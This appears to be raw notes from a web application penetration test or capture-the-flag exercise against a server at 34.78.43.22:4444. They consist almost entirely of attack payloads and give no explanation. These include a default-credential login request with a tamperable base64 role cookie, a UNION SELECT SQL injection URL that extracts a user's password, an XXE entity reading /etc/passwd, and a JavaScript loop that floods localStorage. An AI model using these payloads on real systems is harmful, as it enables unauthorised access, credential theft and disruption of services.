GET /login?username=Superadmin&password=Superadmin HTTP/1.1
Host: 34.78.43.22:4444
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://34.78.43.22:4444/login?username=Superadmin&password=adddd
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: userrole=dXNlcg==; JSESSIONID=4717976C33340075FF2CAA2237724495
Connection: close



http://34.78.43.22:4444/profile/2%20union%20select%201,%202,3,4,5,6,7,8,9,10,%20PassWord%20from%20users%20where%20UsrName=%27RegularUser%27

http://34.78.43.22:4444/dashboard/1;jsessionid=65783D520A70BF9F0D5B23B5D0F2C4F6


<!DOCTYPE item [ <!ELEMENT item ANY >

<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<items><item name="item1">a</item>

<item name="item2">&xxe;</item>

<item name="item3">c</item>

<item name="item4">d</item>

</items


javascript:for (let i = 0; i < 1000000; i++) {   localStorage.setItem('key' + i, 'value'); }


http://34.78.43.22:4444/profile/2%20union%20select%201,%202,3,4,5,6,7,8,9,10,%20PassWord%20from%20users%20where%20UsrName='RegularUser'
